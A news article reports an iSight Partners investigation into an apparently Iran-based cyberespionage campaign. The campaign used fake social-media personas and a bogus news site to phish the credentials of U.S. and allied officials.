Hackers apparently based in Iran have mounted a three-year campaign of cyberespionage against high-ranking U.S. and international officials, including a four-star admiral, to gather intelligence on economic sanctions, antinuclear proliferation efforts and other issues, according to cybersecurity investigators.
Using an elaborate ruse involving more than a dozen personas working for a fake U.S. news organization, the hackers developed connections to their targets through websites like Facebook and LinkedIn to trick them into giving up personal data and logon information, the investigators say.
The alleged campaign, which dates back at least to 2011 and is still under way, principally has focused on U.S. and Israeli targets in public and private sectors, but also has included similar officials in countries such as the U.K., Saudi Arabia, Syria and Iraq, according to the investigators.
The campaign was uncovered by the cybersecurity firm iSight Partners, which has been tracking it for six months. The iSight report provides the first detailed public look inside what the investigators say is an extensive cyberespionage campaign against the U.S. by Iranian hackers, and shows to an extent not previously understood their ability to conduct extensive and lengthy targeting of key individuals, much in the mold of Chinese cyberspies.
"It is such a complex and broad-reaching, long-term espionage campaign for the Iranians," said Tiffany Jones, a senior vice president at iSight and a former National Security Council aide in the George W. Bush administration. "What they lack in technical sophistication, they make up in creativity and persistence."
ISight, which is based in Dallas, specializes in cyberthreat intelligence. Its clients include government agencies and companies across the Fortune 500.
Iranian hackers have developed a reputation for very public and destructive attacks on company websites and computer networks, particularly U.S. banks and Middle Eastern energy firms. But their clandestine cybertactics are less understood. They have infiltrated a U.S. Navy network and U.S. energy-company networks, The Wall Street Journal previously has reported.
In the past year, Iranian hackers have become among the top cybersecurity concerns for many U.S. military and intelligence officials who see them as more highly motivated to harm the U.S. than more traditional cyber-adversaries in Russia and China.
Iranian officials have denied any role in past hacking incidents, and charge the U.S. with being behind a massive cyberattack in recent years, unleashing the Stuxnet virus into Iranian computers.
The iSight report, to be released Thursday, doesn't provide direct evidence of official Iranian backing, but outlines circumstantial evidence. The website of the fake news organization used by the hackers as their cover, NewsOnAir.org, is registered in Tehran, and the hackers keep business hours consistent with both the workday and workweek in Tehran. The Persian term for swallows, "parastoo," was used as a password for some of the cyberspying software used in the campaign.
The focus of the spying also points to Iranian interests. This campaign appears aimed at collecting a range of information that could support the development of weapons systems, provide U.S. military secrets, supply details of the U.S.-Israeli relationship, and offer new insights into U.S. plans for economic sanctions and nuclear talks, according to the investigators.
It isn't known how much of the alleged campaign iSight has uncovered, and the cybersecurity firm wouldn't identify the targets it says were affected, citing client confidentiality.
This intelligence also could be used to mount more destructive attacks, according to iSight. such as the one against the Saudi oil company Aramco in 2012, which effectively destroyed 30,000 computers.
ISight has provided its finding to the Federal Bureau of Investigation and other U.S. government organizations, and has worked with social-media companies to shut down some activity. But NewsOnAir.org remains up and running. The FBI declined to comment.
High-ranking U.S. government officials who were targeted were those working on U.S. foreign policy directly related to Iranian interests, such as nuclear proliferation and sanctions. Hackers also targeted Israeli defense contractors and lobbyists who focus on the U.S.-Israel relationship, the report alleged.
The nature of cyber research is such that it produces evidence on fragmented pieces of a campaign that researchers then must connect. Examples that iSight cites are similarly piecemeal.
With the unnamed four-star admiral, the hackers sought out and made online connections to the officer's family members, former classmates and colleagues and co-workers, according to iSight researchers. The hackers allegedly then used those connections as bona fides to get the admiral to connect, too.
Researchers at iSight declined to provide further details, citing confidentially agreements.
A case of one senior government official shows in more detail how the hackers allegedly operated. In 2013, they friended on Facebook people who had gone to school and had served in government with the official, according to the investigators. They built up about a dozen connections over a month and then sent an invitation to connect to the official they were interested in targeting. The official accepted, giving the hackers their first foothold.
From there, the hackers sent a Facebook message to the official with links to seemingly innocuous things, the report said. One link appeared to be a YouTube video of the F-35 Joint Strike Fighter. Clicking on that link sent the official to an apparent Google sign-in page asking for a username and password. But that Web page was set up to send the username and password to the hackers and then direct the official to the video so the information theft wasn't obvious.
"Creating fake profiles and distributing malware are clear violations of our policies," said Facebook spokesman Jay Nancarrow. "We removed all of the offending profiles we found to be associated with the fake NewsOnAir organization, and we have used this case to further refine our systems that catch fake accounts at various points of interaction on the site and block malware from spreading."
Axarhöfði 14,
110 Reykjavik, Iceland